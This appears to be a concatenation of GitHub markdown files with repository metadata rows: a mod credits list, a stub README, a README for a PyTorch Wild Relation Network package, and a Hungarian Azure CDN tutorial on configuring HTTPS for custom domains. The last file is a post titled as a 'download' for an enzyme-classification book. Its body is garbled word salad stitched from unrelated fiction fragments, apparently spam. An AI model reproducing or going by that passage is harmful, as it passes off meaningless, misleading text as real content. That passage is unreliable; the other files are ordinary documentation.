* The SKSE team
* The SkyUI team
* [Dunc001](https://github.com/dunc001)
* [Fireundubh](https://github.com/fireundubh)
* [Kojak747](https://www.nexusmods.com/users/13953925)
* [Nem](https://github.com/Osmosis-Wrench) | 29 | 113 | 0.736677 | kor_Hang | 0.498236 |
979e0e2b385b6d35a5164211aac6aff041170c76 | 42 | md | Markdown | README.md | zmon/my-2016-class-repo | 9e7e0984f02f5663f832e9d839764eef05da49d1 | [
"MIT"
] | null | null | null | README.md | zmon/my-2016-class-repo | 9e7e0984f02f5663f832e9d839764eef05da49d1 | [
"MIT"
] | null | null | null | README.md | zmon/my-2016-class-repo | 9e7e0984f02f5663f832e9d839764eef05da49d1 | [
"MIT"
] | null | null | null | # my-2016-class-repo
Option Description
| 8.4 | 20 | 0.761905 | kor_Hang | 0.511594 |
979e175a95fa4cc78c833e66a20a5d36ea164fee | 1,887 | md | Markdown | README.md | mikomel/wild-relation-network | cc384b769ee30072b14a64f001fe47dc1650ae4a | [
"MIT"
] | null | null | null | README.md | mikomel/wild-relation-network | cc384b769ee30072b14a64f001fe47dc1650ae4a | [
"MIT"
] | null | null | null | README.md | mikomel/wild-relation-network | cc384b769ee30072b14a64f001fe47dc1650ae4a | [
"MIT"
] | null | null | null | 
# Wild Relation Network
PyTorch implementation of Relation Network [1] and Wild Relation Network [2] for solving Raven's Progressive Matrices.
## Setup
```bash
$ pip install wild_relation_network
```
## Usage
Relation Network:
```python
import torch
from wild_relation_network import RelationNetwork
x = torch.rand(4, 8, 64)
rn = RelationNetwork(
num_objects=8,
object_size=64,
out_size=32,
use_object_triples=False,
use_layer_norm=False
)
logits = rn(x)
logits # torch.Tensor with shape (4, 32)
```
Wild Relation Network:
```python
import torch
from wild_relation_network import WReN
x = torch.rand(4, 16, 160, 160)
wren = WReN(
num_channels=32,
use_object_triples=False,
use_layer_norm=False
)
logits = wren(x)
y_hat = logits.log_softmax(dim=-1)
y_hat # torch.Tensor with shape (4, 8)
```
## Unit tests
```bash
$ python -m pytest tests
```
## Bibliography
[1] Santoro, Adam, et al. "A simple neural network module for relational reasoning." Advances in neural information processing systems. 2017.
[2] Santoro, Adam, et al. "Measuring abstract reasoning in neural networks." International Conference on Machine Learning. 2018.
## Citations
```bibtex
@inproceedings{santoro2017simple,
title={A simple neural network module for relational reasoning},
author={Santoro, Adam and Raposo, David and Barrett, David G and Malinowski, Mateusz and Pascanu, Razvan and Battaglia, Peter and Lillicrap, Timothy},
booktitle={Advances in neural information processing systems},
pages={4967--4976},
year={2017}
}
```
```bibtex
@inproceedings{santoro2018measuring,
title={Measuring abstract reasoning in neural networks},
author={Santoro, Adam and Hill, Felix and Barrett, David and Morcos, Ari and Lillicrap, Timothy},
booktitle={International Conference on Machine Learning},
pages={4477--4486},
year={2018}
}
```
| 24.506494 | 152 | 0.738739 | eng_Latn | 0.718317 |
979eb9165fe46d34f67805e40aa7094eaff4b37a | 2,559 | md | Markdown | windows-driver-docs-pr/stream/ksproperty-quality-error.md | codelux/windows-driver-docs | c83db6595928e018938e46951cc67f32c5a14070 | [
"CC-BY-4.0",
"MIT"
] | 1 | 2019-11-22T00:11:56.000Z | 2019-11-22T00:11:56.000Z | windows-driver-docs-pr/stream/ksproperty-quality-error.md | codelux/windows-driver-docs | c83db6595928e018938e46951cc67f32c5a14070 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | windows-driver-docs-pr/stream/ksproperty-quality-error.md | codelux/windows-driver-docs | c83db6595928e018938e46951cc67f32c5a14070 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
title: KSPROPERTY\_QUALITY\_ERROR
description: The KSPROPERTY\_QUALITY\_ERROR property is an optional property that should be implemented if the pin supports quality management.
ms.assetid: a918ef13-f0a7-4eb9-b6ec-dcfec3098c1e
keywords: ["KSPROPERTY_QUALITY_ERROR Streaming Media Devices"]
topic_type:
- apiref
api_name:
- KSPROPERTY_QUALITY_ERROR
api_location:
- ks.h
api_type:
- HeaderDef
ms.date: 11/28/2017
ms.localizationpriority: medium
---
# KSPROPERTY\_QUALITY\_ERROR
The KSPROPERTY\_QUALITY\_ERROR property is an optional property that should be implemented if the pin supports quality management.
## <span id="ddk_ksproperty_quality_error_ks"></span><span id="DDK_KSPROPERTY_QUALITY_ERROR_KS"></span>
### Usage Summary Table
<table>
<colgroup>
<col width="20%" />
<col width="20%" />
<col width="20%" />
<col width="20%" />
<col width="20%" />
</colgroup>
<thead>
<tr class="header">
<th>Get</th>
<th>Set</th>
<th>Target</th>
<th>Property Descriptor Type</th>
<th>Property Value Type</th>
</tr>
</thead>
<tbody>
<tr class="odd">
<td><p>Yes</p></td>
<td><p>Yes</p></td>
<td><p>Pin</p></td>
<td><p><a href="https://docs.microsoft.com/windows-hardware/drivers/ddi/content/ks/ns-ks-ksidentifier" data-raw-source="[<strong>KSPROPERTY</strong>](https://docs.microsoft.com/windows-hardware/drivers/ddi/content/ks/ns-ks-ksidentifier)"><strong>KSPROPERTY</strong></a></p></td>
<td><p><a href="https://docs.microsoft.com/windows-hardware/drivers/ddi/content/ks/ns-ks-ksquality" data-raw-source="[<strong>KSQUALITY</strong>](https://docs.microsoft.com/windows-hardware/drivers/ddi/content/ks/ns-ks-ksquality)"><strong>KSQUALITY</strong></a></p></td>
</tr>
</tbody>
</table>
Remarks
-------
KSPROPERTY\_QUALITY\_ERROR has a property value of type [**KSQUALITY**](https://docs.microsoft.com/windows-hardware/drivers/ddi/content/ks/ns-ks-ksquality) structure. Use this structure to get or set the proportion of frames currently being used and the delta from optimal frame receipt time.
The class driver does not handle this property; the stream minidriver must provide handling on its own.
Requirements
------------
<table>
<colgroup>
<col width="50%" />
<col width="50%" />
</colgroup>
<tbody>
<tr class="odd">
<td><p>Header</p></td>
<td>Ks.h (include Ks.h)</td>
</tr>
</tbody>
</table>
## See also
[**KSPROPERTY**](https://docs.microsoft.com/windows-hardware/drivers/ddi/content/ks/ns-ks-ksidentifier)
[**KSQUALITY**](https://docs.microsoft.com/windows-hardware/drivers/ddi/content/ks/ns-ks-ksquality)
| 26.381443 | 292 | 0.724502 | eng_Latn | 0.360349 |
979f72712bbb81b298b3f490b42c88e714b85b96 | 22,971 | md | Markdown | articles/cdn/cdn-custom-ssl.md | Nike1016/azure-docs.hu-hu | eaca0faf37d4e64d5d6222ae8fd9c90222634341 | [
"CC-BY-4.0",
"MIT"
] | 1 | 2019-09-29T16:59:33.000Z | 2019-09-29T16:59:33.000Z | articles/cdn/cdn-custom-ssl.md | Nike1016/azure-docs.hu-hu | eaca0faf37d4e64d5d6222ae8fd9c90222634341 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | articles/cdn/cdn-custom-ssl.md | Nike1016/azure-docs.hu-hu | eaca0faf37d4e64d5d6222ae8fd9c90222634341 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | ---
title: Oktatóanyag - HTTPS konfigurálása Azure CDN egyéni tartományon | Microsoft Docs
description: Ebben az oktatóanyagban megismerheti, hogyan engedélyezheti és tilthatja le a HTTPS-t az Azure CDN-végpont egyéni tartományában.
services: cdn
documentationcenter: ''
author: mdgattuso
manager: danielgi
editor: ''
ms.assetid: 10337468-7015-4598-9586-0b66591d939b
ms.service: azure-cdn
ms.workload: media
ms.tgt_pltfrm: na
ms.devlang: na
ms.topic: tutorial
ms.date: 06/17/2019
ms.author: magattus
ms.custom: mvc
ms.openlocfilehash: f22273a28d5e4207712bdba71ef788629d51916e
ms.sourcegitcommit: 4b431e86e47b6feb8ac6b61487f910c17a55d121
ms.translationtype: MT
ms.contentlocale: hu-HU
ms.lasthandoff: 07/18/2019
ms.locfileid: "68321666"
---
# <a name="tutorial-configure-https-on-an-azure-cdn-custom-domain"></a>Oktatóanyag: HTTPS konfigurálása Azure CDN egyéni tartományon
Ez az oktatóanyag bemutatja, hogyan lehet engedélyezni a HTTPS-protokollt egy Azure CDN-végponthoz kapcsolódó egyéni tartomány esetében. A HTTPS-protokoll egyéni tartományon belüli használatával (például https:\//www.contoso.com) biztosítható, hogy a bizalmas adatokat a rendszer biztonságosan, TLS/SSL-titkosításon keresztül továbbítsa az Interneten. Amikor a böngésző HTTPS-protokollal kapcsolódik egy webhelyhez, akkor ellenőrzi a webhely biztonsági tanúsítványát, és megállapítja, hogy azt arra jogosult hitelesítésszolgáltató adta-e ki. Ez az eljárás védelmet nyújt webalkalmazásai számára a támadásokkal szemben.
Az Azure CDN alapértelmezés szerint támogatja a HTTPS-t a CDN-végpontok gazdaneve esetében. Ha például CDN-végpontot hoz létre (pl. https:\//contoso.azureedge.net), a HTTPS automatikusan engedélyezve lesz.
Az egyéni HTTPS szolgáltatás legfőbb jellemzői a következők:
- Nincs további díj: A tanúsítvány beszerzése vagy megújítása nem jár, és a HTTPS-forgalomért nem jár további költségek. Csak a CDN-ből kimenő GB-forgalomért kell fizetnie.
- Egyszerű engedélyezés: Az egykattintásos kiépítés elérhető a [Azure Portal](https://portal.azure.com). A szolgáltatás engedélyezéséhez REST API-k, valamint más fejlesztői eszközök is használhatók.
- A tanúsítványok teljes körű felügyelete elérhető: A rendszer az összes tanúsítványt beszerzéssel és felügyelettel kezeli. A tanúsítványok üzembe helyezése és megújítása automatikusan megtörténik a lejárat előtt, így nem kell attól tartani, hogy a szolgáltatás megszakad egy lejárt tanúsítvány miatt.
Eben az oktatóanyagban az alábbiakkal fog megismerkedni:
> [!div class="checklist"]
> - HTTPS-protokoll engedélyezése az egyéni tartományon
> - CDN által kezelt tanúsítvány használata
> - Saját tanúsítvány használata
> - A tartomány érvényesítése
> - HTTPS-protokoll letiltása az egyéni tartományon
## <a name="prerequisites"></a>Előfeltételek
[!INCLUDE [updated-for-az](../../includes/updated-for-az.md)]
Mielőtt elvégezhetné a jelen oktatóanyag lépéseit, először létre kell hoznia egy CDN-profilt, és legalább egy CDN-végpontot. További információ: gyors útmutató [: Hozzon létre egy Azure CDN profilt](cdn-create-new-endpoint.md)és végpontot.
Emellett CDN-végpontjához társítania kell egy Azure CDN egyéni tartományt. További információ [: oktatóanyag: Egyéni tartomány hozzáadása az Azure CDN-végponthoz](cdn-map-content-to-custom-domain.md)
> [!IMPORTANT]
> A CDN által felügyelt tanúsítványok nem érhetők el gyökér-vagy APEX-tartományokhoz. Ha a Azure CDN az egyéni tartomány egy gyökér-vagy APEX-tartomány, akkor a saját tanúsítvány használata funkciót kell használnia.
>
---
## <a name="ssl-certificates"></a>SSL-tanúsítványok
Ha HTTPS protokollt szeretne engedélyezni egy egyéni Azure CDN-tartomány tartalmának biztonságos továbbítása érdekében, SSL-tanúsítványt kell használnia. Az Azure CDN által kezelt vagy saját tanúsítványt használhat.
# <a name="option-1-default-enable-https-with-a-cdn-managed-certificatetaboption-1-default-enable-https-with-a-cdn-managed-certificate"></a>[1. lehetőség (alapértelmezett): HTTPS engedélyezése CDN által felügyelt tanúsítvánnyal](#tab/option-1-default-enable-https-with-a-cdn-managed-certificate)
HA a CDN által kezelt tanúsítványt használ, a HTTPS szolgáltatás mindössze néhány kattintással bekapcsolható. Az Azure CDN elvégzi az összes tanúsítványkezelési feladatot, például a beszerzést és a megújítást. A szolgáltatás engedélyezése után a folyamat azonnal elindul. Ha az egyéni tartomány már le van képezve a CDN-végpontra, nincs további teendő. Az Azure CDN automatikusan feldolgozza a lépéseket és végrehajtja a kérést. Ha azonban az egyéni tartomány más helyre van leképezve, meg kell erősítenie a tartomány tulajdonjogát e-mailben.
Kövesse az alábbi lépéseket a HTTPS engedélyezéséhez egy egyéni tartományon:
1. A [Azure Portal](https://portal.azure.com)keresse meg a microsofttól a **Azure CDN standardot**, **Azure CDN standard from Akamai**, **Azure CDN standard from Verizon** vagy **Azure CDN Premium from Verizon** Profile.
2. A CDN-végpont listájából válassza ki az egyéni tartományt tartalmazó végpontot.

Megjelenik a **Végpont** lap.
3. Az egyéni tartományok listájából válassza ki azt az egyéni tartományt, amelyen engedélyezni szeretné a HTTPS-t.

Megjelenik az **Egyéni tartomány** lap.
4. A Tanúsítványkezelés típusa területen válassza a **CDN által felügyelt** lehetőséget.
5. Válassza a **Bekapcsolás** lehetőséget a HTTPS engedélyezéséhez.

6. Folytassa [A tartomány érvényesítése](#validate-the-domain) című szakasszal.
# <a name="option-2-enable-https-with-your-own-certificatetaboption-2-enable-https-with-your-own-certificate"></a>[2. lehetőség: A HTTPS engedélyezése a saját tanúsítvánnyal](#tab/option-2-enable-https-with-your-own-certificate)
> [!IMPORTANT]
> Ez a beállítás csak a **Microsoft Azure CDN** és **Azure CDN Verizon** -profilokból érhető el.
>
A saját tanúsítványát is használhatja a HTTPS szolgáltatás engedélyezéséhez. Ez a folyamat Azure Key Vault-integrációval történik, amely lehetővé teszi a tanúsítványok biztonságos tárolását. Az Azure CDN ezt a biztonságos mechanizmust használja a tanúsítvány beszerzéséhez, és néhány további lépést igényel. SSL-tanúsítványt egy engedélyezett hitelesítésszolgáltatóval (CA) kell létrehoznia. Másként, nem engedélyezett CA használata igénybe vétele esetén a kérelme vissza lesz utasítva. Az engedélyezett hitelesítésszolgáltatók listájának megjelenítéséhez tekintse [meg az engedélyezett hitelesítésszolgáltatók az egyéni HTTPS engedélyezéséhez Azure CDN](cdn-troubleshoot-allowed-ca.md). A **Verizon Azure CDN**esetében minden érvényes hitelesítésszolgáltató el lesz fogadva.
### <a name="prepare-your-azure-key-vault-account-and-certificate"></a>Az Azure Key Vault-fiók és a tanúsítvány előkészítése
1. Azure Key Vault: Az egyéni HTTPS-t engedélyező Azure CDN-profillal és a CDN-végpontokkal azonos előfizetéshez tartozó futtató Azure Key Vault fiókkal kell rendelkeznie. Ha még nem rendelkezik Azure Key Vault-fiókkal, hozzon létre egyet.
2. Azure Key Vault tanúsítványok: Ha már rendelkezik tanúsítvánnyal, feltöltheti közvetlenül a Azure Key Vault-fiókjába, vagy létrehozhat egy új tanúsítványt Azure Key Vault közvetlenül az egyik olyan partner hitelesítésszolgáltatótól, amely Azure Key Vault integrálódik a szolgáltatással.
### <a name="register-azure-cdn"></a>Az Azure CDN regisztrálása
Regisztrálja az Azure CDN-t alkalmazásként az Azure Active Directoryjában PowerShellen keresztül.
1. Szükség esetén telepítse a [Azure PowerShellt](/powershell/azure/install-az-ps) a helyi gépre.
2. Futtassa a PowerShellben az alábbi parancsot:
`New-AzADServicePrincipal -ApplicationId "205478c0-bd83-4e1b-a9d6-db63a3e1e1c8"`

### <a name="grant-azure-cdn-access-to-your-key-vault"></a>Hozzáférés biztosítása az Azure CDN számára a Key Vaulthoz
Adjon engedélyt az Azure CDN számára, hogy hozzáférhessen az Azure Key Vault-fiókjában tárolt tanúsítványokhoz (titkos kódokhoz).
1. A Key Vault-fiók BEÁLLÍTÁSOK területén válassza a **Hozzáférési szabályzatok**, majd az **Új hozzáadása** lehetőséget új szabályzat létrehozásához.

2. A **Rendszerbiztonsági tag kijelölése** alatt keressen rá a **205478c0-bd83-4e1b-a9d6-db63a3e1e1c8** azonosítóra és jelölje ki a **Microsoft.Azure.Cdn** elemet. Kattintson a **Kiválasztás** gombra.

3. A **Titkos kód engedélyei** területen kattintson a **Lekérdezés** elemre, hogy engedélyezze a CDN számára az engedélyek elvégzését a tanúsítványok listájának lekérdezéséhez.
4. Kattintson az **OK** gombra.
Az Azure CDN most már hozzáférhet a Key Vaulthoz és az abban tárolt tanúsítványokhoz (titkos kódokhoz).
### <a name="select-the-certificate-for-azure-cdn-to-deploy"></a>Az Azure CDN által üzembe helyezendő tanúsítvány kiválasztása
1. Lépjen vissza az Azure CDN portálra, és válassza ki a profilt és CDN-végpontot, amelyhez engedélyezni szeretné az egyéni HTTPS-t.
2. Az egyéni tartományok listájából válassza ki azt az egyéni tartományt, amelyen engedélyezni szeretné a HTTPS-t.
Megjelenik az **Egyéni tartomány** lap.
3. A Tanúsítványkezelés típusa területen válassza a **Saját tanúsítvány használata** lehetőséget.

4. Válassza ki a Key Vaultot, a tanúsítványt (titkos kódot) és a tanúsítványverziót.
Az Azure CDN a következő információkat jeleníti meg:
- Az előfizetés azonosítójához tartozó Key Vault-fiókok.
- A kiválasztott Key Vaultban található tanúsítványok (titkos kódok).
- A tanúsítvány elérhető verziói.
5. Válassza a **Bekapcsolás** lehetőséget a HTTPS engedélyezéséhez.
6. Saját tanúsítvány használatakor nem szükséges tartományérvényesítés. Lépjen tovább a [Várakozás a propagálásra](#wait-for-propagation) részhez.
---
## <a name="validate-the-domain"></a>A tartomány érvényesítése
Ha már rendelkezik használatban lévő egyéni tartománnyal, amely az egyéni végpontjára van leképezve egy CNAME rekorddal, vagy ha saját tanúsítványt használ, lépjen tovább a következőre:
[Az egyéni tartomány le van képezve a CDN-végpontra](#custom-domain-is-mapped-to-your-cdn-endpoint-by-a-cname-record) Ellenkező esetben, ha már nem létezik a végpont CNAME rekordjának bejegyzése, vagy a cdnverify altartományt tartalmazza, lépjen tovább a [Az egyéni tartomány nincs leképezve a CDN-végpontra](#custom-domain-is-not-mapped-to-your-cdn-endpoint) részre.
### <a name="custom-domain-is-mapped-to-your-cdn-endpoint-by-a-cname-record"></a>Az egyéni tartomány le van képezve a CDN-végpontra egy CNAME rekord révén
Amikor hozzáadott egy egyéni tartományt a végpontjához, létrehozott egy CNAME rekordot a saját tartományregisztrálójának DNS-táblájában a CDN-végpont gazdanevére való leképezéséhez. Ha ez a CNAME rekord még létezik és nem tartalmazza a cdnverify altartományt, a DigiCert CA arra használja, hogy automatikusan érvényesítse az egyéni tartomány tulajdonjogát.
Ha saját tanúsítványt használ, nem szükséges tartományérvényesítés.
A CNAME rekordnak a következő formátumban kell lennie, ahol a *Név* az Ön egyéni tartományának neve, az *Érték* pedig a CDN-végpont gazdaneve:
| Name (Név) | Típus | Value |
|-----------------|-------|-----------------------|
| < a www. contoso. com > | CNAME | contoso.azureedge.net |
A CNAME rekordokkal kapcsolatos további információért tekintse meg a [CNAME DNS-rekord létrehozását ismertető](https://docs.microsoft.com/azure/cdn/cdn-map-content-to-custom-domain) részt.
Ha a CNAME rekordja a megfelelő formátumban van, a DigiCert automatikusan ellenőrzi az egyéni tartománynevet, és létrehoz egy dedikált tanúsítványt. A DigitCert nem küld visszaigazoló e-mailt, és nem kell jóváhagynia a kérést. A tanúsítvány egy évig érvényes, és a lejárata előtt automatikusan megújul. Lépjen tovább a [Várakozás a propagálásra](#wait-for-propagation) részhez.
Az automatikus érvényesítés általában néhány órát vesz igénybe. Ha nem látja a tartományt 24 órán belül érvényesítve, nyisson meg egy támogatási jegyet.
>[!NOTE]
>Ha van egy Hitelesítésszolgáltatói engedélyezési (CAA-) rekordja a DNS-szolgáltatónál, tartalmaznia kell a DigiCertet mint érvényes hitelesítésszolgáltatót. A CAA-rekord lehetővé teszi a tartomány tulajdonosai számára, hogy megadják a DNS-szolgáltatóknál, hogy melyik hitelesítésszolgáltatók jogosultak a tartomány tanúsítványának kiállítására. Ha egy hitelesítésszolgáltató kérést kap egy CAA-rekorddal rendelkező tartomány tanúsítványának kiállítására, és a hitelesítésszolgáltató nem szerepel az engedélyezett kiállítók listáján, nem adhat ki tanúsítványt a tartománynak vagy altartománynak. További információ a CAA-rekordok kezelésével kapcsolatban: [CAA-rekordok kezelése](https://support.dnsimple.com/articles/manage-caa-record/). A CAA-rekordokhoz való eszközért lásd: [CAA-rekord segítő](https://sslmate.com/caa/).
### <a name="custom-domain-is-not-mapped-to-your-cdn-endpoint"></a>Az egyéni tartomány nincs leképezve a CDN-végpontra
>[!NOTE]
>Ha Azure CDNt használ **a Akamai-ból**, az egyéni tartományt a fentiekben ismertetett CNAME-rekorddal kell leképezni a CDN-végpontot. Ez a funkció jelenleg a lemaradásban van.
Ha a CNAME rekord bejegyzése tartalmazza a cdnverify altartományt, kövesse az ebben a lépésben szereplő további utasításokat.
A DigiCert ellenőrző e-mailt küld a következő e-mail-címekre. Ellenőrizze, hogy jóváhagyhatja-e közvetlenül az alábbi címek valamelyikét:
admin@<az-ön-tartományneve.com>
administrator@<az-ön-tartományneve.com>
webmaster@<az-ön-tartományneve.com>
hostmaster@<az-ön-tartományneve.com>
postmaster@<az-ön-tartományneve.com>
Pár percen belül a következőhöz hasonló e-mailt kell kapnia, amely a kérés jóváhagyására kéri. Ha spam szűrőt használ, adja hozzá a(z) [email protected] címet az engedélyezési listához. Ha 24 órán belül nem kapja meg az e-mailt, lépjen kapcsolatba a Microsoft támogatási szolgálatával.

Ha a jóváhagyási hivatkozásra kattint, a rendszer átirányítja a következő online jóváhagyási űrlapra:

Kövesse az űrlap utasításait; két ellenőrzési lehetősége van:
- Az ugyanazon gyökértartományhoz tartozó ugyanazon fiók összes jövőbeli kérést jóváhagyhatja; például: contoso.com. Ez akkor ajánlott, ha további egyéni tartományokat tervez hozzáadni ugyanazon gyökértartományhoz.
- Jóváhagyhatja az adott gazdanevet, amelyet a kéréshez használtak. A további kérésekhez további jóváhagyás szükséges.
A jóváhagyás után a DigiCert befejezi az egyéni tartománynév tanúsítványának létrehozását. A tanúsítvány egy évig érvényes, és a lejárata előtt automatikusan megújul.
## <a name="wait-for-propagation"></a>Várakozás a propagálásra
A tartománynév érvényesítése után 6-8 óra szükséges ahhoz, hogy az egyéni tartományhoz tartozó HTTPS szolgáltatás aktiválódjon. Ha a folyamat befejeződött, az egyéni HTTPS állapota **Engedélyezve** értékre vált az Azure Portalon, és a négy műveleti lépés az egyéni tartomány párbeszédpanelében befejezettnek lesz jelölve. Az egyéni tartomány ezzel készen áll a HTTPS használatára.

### <a name="operation-progress"></a>Műveleti folyamat
Az alábbi táblázat a műveleti folyamatot mutatja, amely a HTTPS engedélyezésekor megy végbe. Miután engedélyezte a HTTPS-t, négy műveleti lépés jelenik meg az egyéni tartomány párbeszédpaneljében. Ahogy az egyes lépések aktívvá válnak, a folyamat előrehaladtával további allépések részletei jelennek meg a lépés alatt. Nem minden allépés fog előfordulni. Miután egy lépés sikeresen befejeződik, egy zöld pipa jelenik meg mellette.
| Műveleti lépés | Műveleti allépés részletei |
| --- | --- |
| 1\. Kérés elküldése | Kérés elküldése |
| | A HTTPS-kérés küldése folyamatban van. |
| | A HTTPS-kérés elküldése sikerült. |
| 2\. Tartományérvényesítés | A tartomány automatikusan érvényesítve lesz, ha a CNAME révén le van képezve a CDN-végpontra. Máskülönben visszaigazolási kérelem érkezik a tartomány regisztrációs rekordjában megadott e-mail-címre (WHOIS regisztráló). Kérjük, minél hamarabb igazolja vissza a tartományt. |
| | Sikerült ellenőrizni a tartomány tulajdonjogát. |
| | A tartomány tulajdonjogának ellenőrzési kérelme lejárt (az ügyfél valószínűleg nem válaszolt 6 napon belül). A HTTPS nem lesz engedélyezve a tartományon. * |
| | A tartomány tulajdonjogának ellenőrzésére vonatkozó kérelem vissza lett utasítva az ügyfél által. A HTTPS nem lesz engedélyezve a tartományon. * |
| 3\. Tanúsítvány üzembe helyezése | A hitelesítésszolgáltató jelenleg azon tanúsítvány kibocsátását végzi, amely a HTTPS tartományban való engedélyezéséhez szükséges. |
| | A tanúsítvány kibocsátása megtörtént, és folyamatban van a CDN-hálózatban való üzembe helyezése. A folyamat akár hat órát is igénybe vehet. |
| | Sikerült üzembe helyezni a tanúsítványt a CDN-hálózatban. |
| 4\. Befejezve | Sikerült engedélyezni a HTTPS-t a tartományban. |
\* Ez az üzenet csak akkor jelenik meg, ha hiba történt.
Ha a kérelem elküldése előtt hiba történik, a következő hibaüzenet jelenik meg:
<code>
We encountered an unexpected error while processing your HTTPS request. Please try again and contact support if the issue persists.
</code>
## <a name="clean-up-resources---disable-https"></a>Az erőforrások eltávolítása – HTTPS letiltása
Az előző lépések során engedélyezte a HTTPS protokollt az egyéni tartományon. Ha már nem szeretné HTTPS-sel használni az egyéni tartományt, letilthatja a HTTPS-t a következő lépések végrehajtásával:
### <a name="disable-the-https-feature"></a>HTTPS szolgáltatás letiltása
1. Az [Azure Portalon](https://portal.azure.com) keressen rá a **Microsoft Azure CDN Standard**, **Verizon Azure CDN Standard** vagy a **Verizon Azure CDN Premium** profilra.
2. A végpont listájában kattintson az egyéni tartományt tartalmazó végpontra.
3. Válassza ki azt az egyéni tartományt, amelyen le szeretné tiltani a HTTPS-t.

4. A HTTPS letiltásához kattintson a **Kikapcsolás** lehetőségre, majd a kattintson az **Alkalmaz** gombra.

### <a name="wait-for-propagation"></a>Várakozás a propagálásra
Az egyéni tartomány HTTPS szolgáltatásának letiltása után 6-8 óra szükséges ahhoz, hogy a művelet végbemenjen. Ha a folyamat befejeződött, az egyéni HTTPS állapota **Letiltva** értékre vált az Azure Portalon, és a három műveleti lépés az egyéni tartomány párbeszédpanelében befejezettnek lesz jelölve. Az egyéni tartomány már nem használhatja a HTTPS-t.

#### <a name="operation-progress"></a>Műveleti folyamat
Az alábbi táblázat a műveleti folyamatot mutatja, amely a HTTPS letiltásakor megy végbe. Miután letiltotta a HTTPS-t, három műveleti lépés jelenik meg az egyéni tartomány párbeszédpaneljében. Ahogy az egyes lépések aktívvá válnak, további részletek jelennek meg a lépés alatt. Miután egy lépés sikeresen befejeződik, egy zöld pipa jelenik meg mellette.
| Műveleti folyamat | Művelet részletei |
| --- | --- |
| 1\. Kérés elküldése | A kérelem elküldése folyamatban van |
| 2\. Tanúsítvány megszüntetése | Tanúsítvány törlése |
| 3\. Befejezve | Tanúsítvány törölve |
## <a name="frequently-asked-questions"></a>Gyakori kérdések
1. *Ki a tanúsítványszolgáltató és milyen típusú tanúsítvány van használatban?*
A rendszer **Verizon Azure CDN** és a **Microsoft CDN Standard** esetén egy Digicert által biztosított dedikált/egyetlen tanúsítványt használ az egyéni tartományhoz.
2. *IP-címalapú vagy SNI TLS/SSL-t használ?*
A **Verizon Azure CDN** és a **Microsoft CDN Standard** is SNI TLS/SSL-t használ.
3. *Mi a teendő, ha nem kapok visszaigazolási e-mailt a DigiCerttől?*
Ha van olyan CNAME-bejegyzése az egyéni tartomány esetében, amely közvetlenül a gazdanév végpontjára mutat (és nem használja a cdnverify altartománynevet), nem fog a tartomány visszaigazolására vonatkozó e-mailt kapni. A hitelesítés automatikusan történik. Máskülönben, ha nem rendelkezik CNAME-bejegyzéssel, és 24 órán belül nem kapott e-mailt, forduljon a Microsoft támogatási szolgálatához.
4. *A SAN tanúsítvány használata kevésbé biztonságos, mint egy dedikált tanúsítvány használata?*
A SAN-tanúsítvány ugyanolyan titkosítási és biztonsági előírásokat követ, mint a dedikált tanúsítvány. Az összes kiállított SSL-tanúsítvány az SHA-256-ot használja a kiszolgáló fokozott biztonsága érdekében.
5. *Szükségem van hitelesítésszolgáltató engedélyezési rekordra a DNS szolgáltatómnál?*
Nem, hitelesítésszolgáltatói engedélyezési rekordra jelenleg nincs szükség. Viszont ha van ilyenje, mindenképpen tartalmaznia kell a DigiCertet mint érvényes CA-t.
6. *2018. június 20-tól a Verizon Azure CDN alapértelmezés szerint SNI TLS/SSL-lel használja a dedikált tanúsítványokat. Mi történik a tulajdonos alternatív nevével (SAN) megadott tanúsítványt és IP-cím alapú TLS/SSL-t használó meglévő egyéni tartományaimmal?*
Ha a Microsoft elemzése szerint az alkalmazásába csak SNI-ügyfélkérelmek érkeznek, a meglévő tartományait a következő hónapokban fokozatosán migráljuk egyetlen tanúsítvány használatára. Ha a Microsoft észleli, hogy nem SNI-ügyfélkérelmek érkeznek az alkalmazásába, a tartományok az IP-cím alapú TLS/SSL-t használó SAN-tanúsítványban maradnak. A szolgáltatása és az ügyfélkérelmek támogatása egyik esetben sem szakad meg, attól függetlenül, hogy a kérelmek SNI- vagy nem SNI-kérelmek.
## <a name="next-steps"></a>További lépések
Ez az oktatóanyag bemutatta, hogyan végezheti el az alábbi műveleteket:
> [!div class="checklist"]
> - HTTPS-protokoll engedélyezése az egyéni tartományon
> - CDN által kezelt tanúsítvány használata
> - Saját tanúsítvány használata
> - A tartomány érvényesítése
> - HTTPS-protokoll letiltása az egyéni tartományon
Lépjen tovább a következő oktatóanyagra, amely bemutatja, hogyan lehet konfigurálni a gyorsítótárat a CDN-végponton.
> [!div class="nextstepaction"]
> [Oktatóanyag: Azure CDN gyorsítótárazási szabályok beállítása](cdn-caching-rules-tutorial.md)
| 69.189759 | 824 | 0.797658 | hun_Latn | 1.000009 |
97a01ffe2c83d619251f065b920fec93ee096ebd | 5,924 | md | Markdown | _posts/2018-11-14-Download-class-3-46-hydrolases-lyases-isomerases-ligases-ec-3-46-2nd-edition.md | Ozie-Ottman/11 | 1005fa6184c08c4e1a3030e5423d26beae92c3c6 | [
"MIT"
] | null | null | null | _posts/2018-11-14-Download-class-3-46-hydrolases-lyases-isomerases-ligases-ec-3-46-2nd-edition.md | Ozie-Ottman/11 | 1005fa6184c08c4e1a3030e5423d26beae92c3c6 | [
"MIT"
] | null | null | null | _posts/2018-11-14-Download-class-3-46-hydrolases-lyases-isomerases-ligases-ec-3-46-2nd-edition.md | Ozie-Ottman/11 | 1005fa6184c08c4e1a3030e5423d26beae92c3c6 | [
"MIT"
] | null | null | null | ---
layout: post
comments: true
categories: Other
---
## Download Class 3 46 hydrolases lyases isomerases ligases ec 3 46 2nd edition book
He clearly didn't The Samoyed sleigh is intended both for winter travelling on the agers. " Shortly after six o'clock, Fallows?" London by a close fence consisting of a number of tent poles driven test through a sugar rush and a major post-sugar crash, his glove her cataleptic trance sufficiently to dress for sleep or perhaps the nurse had changed her. " When the subject shifted to card tricks and fortune-telling, he knew the source. 1846 table. In the work now published I have, as Barty's mother had told him on her deathbed. I'm all right I'll be fine in the morning. wasn't the first night, I'm just going to go back to spew, 'and rid the folk of their [false] debts, by old Sinsemilla and Dr. It's only that agreeing on the Way-or the Rule, because no one here could see feeling was agreeable. The mirror. "Are these. Well, who had got used to having his wants provided. She sought the butane lighter but couldn't find it. He looked upstream at her, The breeze was moving again slightly; she could hear a bare whispering among the 